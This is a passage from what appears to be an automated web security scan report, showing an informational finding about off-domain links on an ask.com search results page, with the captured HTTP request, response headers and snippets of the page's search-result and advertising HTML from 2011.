onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r6_t" href="http://www.raintoday.co.uk/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Will it <b>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.lyricsmode.com/lyrics/k/katie_melua/i_think_its_going_to_rain_today.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Katie Melua - I Think <b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.lyricsmode.com/lyrics/u/ub40/i_think_its_going_to_rain_today.html"
onmousedown="return fp(this,{en:'in',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Ub40 - I Think It's <b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.ultimate-guitar.com/tabs/k/katie_melua/i_think_its_going_to_rain_today_crd.htm"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >I Think <b>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C2JlWF8tBTbzgFca9gweNtai3D_-UtNgB19PHzhXaiekEEAEg-_6BAygFUJDfusgHYMmGo4fUo4AQoAHRxuDzA8gBAaoEHk_QyxAmurfZnFqxDgg0-I3-V1xJyWZgLFO3QTuikw&num=1&sig=AGiWqtw0Zcro-S-hVohA221ltAjbHd9Pjw&adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D0%26sicreative%3D5712315807%26sitrackingid%3D157750541" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(18); if (typeof efclk != 'undefined') efclk(18); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_0');" class="nu" onmouseover="return ss('instantweatherforecast.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=C2JlWF8tBTbzgFca9gweNtai3D_-UtNgB19PHzhXaiekEEAEg-_6BAygFUJDfusgHYMmGo4fUo4AQoAHRxuDzA8gBAaoEHk_QyxAmurfZnFqxDgg0-I3-V1xJyWZgLFO3QTuikw&num=1&sig=AGiWqtw0Zcro-S-hVohA221ltAjbHd9Pjw&adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D0%26sicreative%3D5712315807%26sitrackingid%3D157750541" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(18); if (typeof efclk != 'undefined') efclk(18); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_0');" class="nu" onmouseover="return ss('instantweatherforecast.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=Cqt1bF8tBTbzgFca9gweNtai3D6jnhcUB2K646xjY9ecMEAIg-_6BAygFUKSdoZ0BYMmGo4fUo4AQyAEBqQLZQvU5Sd6wPqoEHk_QuwtmurTZnFqxDgh9ppfqV1xJyWZgLFO3QTuikw&num=2&sig=AGiWqtzaqlkpDOQFi4s1FtegTgBeyHM8hw&adurl=http://na.link.decdna.net/n/63605/103595/www.ontariotravel.net/1htg5j9%3B11%3B4%3B%3B8%3B7l30%3Bamv080%3Bgj97x%3B%3Bgvzap%3Bcak%3B1%3B/i/c%3F0%26pq%3D%252fTCISSegmentsWeb%252fmain%252eportal%253fsetlanguage%253dEN%26247cr%3D6573809208%26247subproduct%3DSEARCH" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(43); if (typeof efclk != 'undefined') efclk(43); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_1');" class="nu" onmouseover="return ss('ontariotravel.net')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Cqt1bF8tBTbzgFca9gweNtai3D6jnhcUB2K646xjY9ecMEAIg-_6BAygFUKSdoZ0BYMmGo4fUo4AQyAEBqQLZQvU5Sd6wPqoEHk_QuwtmurTZnFqxDgh9ppfqV1xJyWZgLFO3QTuikw&num=2&sig=AGiWqtzaqlkpDOQFi4s1FtegTgBeyHM8hw&adurl=http://na.link.decdna.net/n/63605/103595/www.ontariotravel.net/1htg5j9%3B11%3B4%3B%3B8%3B7l30%3Bamv080%3Bgj97x%3B%3Bgvzap%3Bcak%3B1%3B/i/c%3F0%26pq%3D%252fTCISSegmentsWeb%252fmain%252eportal%253fsetlanguage%253dEN%26247cr%3D6573809208%26247subproduct%3DSEARCH" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(43); if (typeof efclk != 'undefined') efclk(43); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_1');" class="nu" onmouseover="return ss('ontariotravel.net')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C60WVF8tBTbzgFca9gweNtai3D_qnusUBkueapxWuyOkEEAMg-_6BAygFUKGOuKkDYMmGo4fUo4AQoAGlvYb_A8gBAaoEIU_QqzQhurXZnFqxRgii2nUoZsR0B4A3_1B6rj0AqIoFUg&num=3&sig=AGiWqtya-9GQ-X3QZy32kNIPC6VOYjGL9A&adurl=http://www.local.com/results.aspx%3Fkeyword%3Dweather%26cid%3D1265%26location%3DWashington%2BDC" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_2');" class="nu" onmouseover="return ss('local.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=C60WVF8tBTbzgFca9gweNtai3D_qnusUBkueapxWuyOkEEAMg-_6BAygFUKGOuKkDYMmGo4fUo4AQoAGlvYb_A8gBAaoEIU_QqzQhurXZnFqxRgii2nUoZsR0B4A3_1B6rj0AqIoFUg&num=3&sig=AGiWqtya-9GQ-X3QZy32kNIPC6VOYjGL9A&adurl=http://www.local.com/results.aspx%3Fkeyword%3Dweather%26cid%3D1265%26location%3DWashington%2BDC" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_2');" class="nu" onmouseover="return ss('local.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CJtAKF8tBTbzgFca9gweNtai3D_e89qEBgfyUgw60x-IEEAQg-_6BAygFUNChosQHYMmGo4fUo4AQyAEBqgQhT9CrcA26stmcWrFGCKLadRcWqGcHgDf_UHquPQCoigVS&num=4&sig=AGiWqty3ntGtdYYy1GWP0M2-J2Fz9s3jKA&adurl=http://www.nowaktours.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(44); if (typeof efclk != 'undefined') efclk(44); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_3');" class="nu" onmouseover="return ss('www.nowaktours.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CJtAKF8tBTbzgFca9gweNtai3D_e89qEBgfyUgw60x-IEEAQg-_6BAygFUNChosQHYMmGo4fUo4AQyAEBqgQhT9CrcA26stmcWrFGCKLadRcWqGcHgDf_UHquPQCoigVS&num=4&sig=AGiWqty3ntGtdYYy1GWP0M2-J2Fz9s3jKA&adurl=http://www.nowaktours.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(44); if (typeof efclk != 'undefined') efclk(44); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_3');" class="nu" onmouseover="return ss('www.nowaktours.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CKfimF8tBTbzgFca9gweNtai3D87C3ha27Z_cAtj15wwQBSD7_oEDKAVQz-u07gNgyYajh9SjgBDIAQGqBBtP0MtMMrqz2ZxasUYIost03Zm6HhplrcNVFXo&num=5&sig=AGiWqtzLagMVN4rw1cRVmOqPmESbZeysOA&adurl=http://www.cinderellatravel.com/visas_kazakhstan.php" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(86); if (typeof efclk != 'undefined') efclk(86); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_4');" class="nu" onmouseover="return ss('www.cinderellatravel.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CKfimF8tBTbzgFca9gweNtai3D87C3ha27Z_cAtj15wwQBSD7_oEDKAVQz-u07gNgyYajh9SjgBDIAQGqBBtP0MtMMrqz2ZxasUYIost03Zm6HhplrcNVFXo&num=5&sig=AGiWqtzLagMVN4rw1cRVmOqPmESbZeysOA&adurl=http://www.cinderellatravel.com/visas_kazakhstan.php" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(86); if (typeof efclk != 'undefined') efclk(86); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_4');" class="nu" onmouseover="return ss('www.cinderellatravel.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1443630502?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.28. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=regulator+boat&search=&qsrc=0&o=0&l=dir

The response contains the following links to other domains:

http://4.afs.googleadservices.com/images/partners/CJWRir-Q26YCFQXc4AodvS_c6Q/aj-cat.png
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=regulator+boat
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1174503742?
http://grillautomotivebestbuy.co.cc/info-Camco_40053_RV_Brass_Water_Pressure_Regulator-B000BQ7WH2.html
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.boatworldusa.com/
http://www.comstockyachtsales.com/
http://www.comstockyachtsales.com/aboutus.asp
http://www.fishingandboats.com/boat-regulator.html
http://www.google.com/aclk?sa=L&ai=C8JicpchBTdWqK4W4gwe93_DODoWC_sYBtYbU7gm9qYcHEAUg-_6BAygFUILDy_j-_____wFgyYajh9SjgBDIAQGqBBtP0No8Z5l8O7vpOwPRT_b64k91mNIub4jkZZw&num=5&sig=AGiWqtxOke1TlNg6wEdR-afxZM4XU5Ch6Q&adurl=http://www.pressure-controls.com
http://www.google.com/aclk?sa=L&ai=CVuNYpchBTdWqK4W4gwe93_DODsmNwHPR0I-RDdbRiAcQASD7_oEDKAVQlbmT_wZgyYajh9SjgBDIAQGpAkmm4aFRvbo-qgQbT9Daa1SZeDu76TsD0U_2-uJPdZjSLm-I5GWE&num=1&sig=AGiWqtyFyPkzzoWfRtEXai8ZbCJHo5AGWQ&adurl=http://www.pharmalinkconsulting.co.uk
http://www.google.com/aclk?sa=l&ai=C3e0TpchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&sig=AGiWqtxuQz3oe5Wp-Esxdy-74Scso2m8zw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts
http://www.google.com/aclk?sa=l&ai=CSN46pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&ctype=4&sig=AGiWqtyUY1GQ2YCCgtmxFxb3AL4rlERjGg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture
http://www.google.com/aclk?sa=l&ai=CWUGJpchBTdWqK4W4gwe93_DODu2R_78Br7bGshWQqMEHEAMg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQK98dWE5OCwPqoEH0_Quj5QmXozu1E4ghtMgAhejaPltk8amgDZ7pU62iw&num=3&sig=AGiWqtwEl-kAbCUEwTlIYfGscY8kCbKy7w&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/
http://www.google.com/aclk?sa=l&ai=CmrS6pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&ctype=4&sig=AGiWqtzsolBc3httcVr9-wCCSaQ859OjQg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing
http://www.google.com/aclk?sa=l&ai=CqWudpchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9CaZm6ZezO7GTgcZd4uIIHxpOmolaqeaIaX6Q&num=2&ctype=4&sig=AGiWqtzPc2X9P-wQ-SLLlcHixif78kjFEQ&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool
http://www.google.com/aclk?sa=l&ai=CwvMapchBTdWqK4W4gwe93_DODpyQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_QmndlmX0zu1E4ggpNTyeN735ZrP315xQ&num=4&sig=AGiWqtyATQ9eFmfuYLlv_wfr636ePByh4Q&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404
http://www.google.com/aclk?sa=l&ai=CzRt2pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9CaZm6ZezO7GTgcZd4uIIHxpOmolaqeaIaX6Q&num=2&ctype=4&sig=AGiWqtywJmSLF1oaD69jRoVir8DA1qMhww&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats
http://www.reel-time.com/forum/showthread.php?t=41911
http://www.regulatormarine.com/
http://www.regulatormarine.com/32fs.html
http://www.regulatormarinegear.com/
http://www.yachtworld.com/boats/category/type/Regulator

Request

GET /web?q=regulator+boat&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:34:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:33:57 GMT; Path=/
Set-Cookie: clc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:33:57 GMT; Path=/
Set-Cookie: ldst=sorg=-1|1296156837583; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:33:57 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:33:57 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjMzOjU3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:33:57 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:33:57 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:33:57 GMT; Path=/
Content-Length: 134495

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=regulator+boat"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<td>

<a id="r1_t" href="http://www.regulatormarine.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a001',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...

<img src="http://4.afs.googleadservices.com/images/partners/CJWRir-Q26YCFQXc4AodvS_c6Q/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>

<span class="T7 fr tp info txt0">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CVuNYpchBTdWqK4W4gwe93_DODsmNwHPR0I-RDdbRiAcQASD7_oEDKAVQlbmT_wZgyYajh9SjgBDIAQGpAkmm4aFRvbo-qgQbT9Daa1SZeDu76TsD0U_2-uJPdZjSLm-I5GWE&num=1&sig=AGiWqtyFyPkzzoWfRtEXai8ZbCJHo5AGWQ&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(1); if (typeof efclk != 'undefined') efclk(1); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_0');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CVuNYpchBTdWqK4W4gwe93_DODsmNwHPR0I-RDdbRiAcQASD7_oEDKAVQlbmT_wZgyYajh9SjgBDIAQGpAkmm4aFRvbo-qgQbT9Daa1SZeDu76TsD0U_2-uJPdZjSLm-I5GWE&num=1&sig=AGiWqtyFyPkzzoWfRtEXai8ZbCJHo5AGWQ&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(1); if (typeof efclk != 'undefined') efclk(1); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_0');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C3e0TpchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&sig=AGiWqtxuQz3oe5Wp-Esxdy-74Scso2m8zw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=C3e0TpchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&sig=AGiWqtxuQz3oe5Wp-Esxdy-74Scso2m8zw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CmrS6pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&ctype=4&sig=AGiWqtzsolBc3httcVr9-wCCSaQ859OjQg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CmrS6pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QmmZumXszuxk4HGXeLiCB8aTpqJWqnmiGl-k&num=2&ctype=4&sig=AGiWqtzsolBc3httcVr9-wCCSaQ859OjQg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CzRt2pchBTdWqK4W4gwe93_DODtvO8tsBk7izyxfr17kIEAIg-_6BAygFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9CaZm6ZezO7GTgcZd4uIIHxpOmolaqeaIaX6Q&num=2&ctype=4&sig=AGiWqtywJmSLF1oaD69jRoVir8DA1qMhww&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D2e5dZ6-b41%26sgch%3D8a34bC0abl'},'gg_1');" class="nu" onmouseover="return 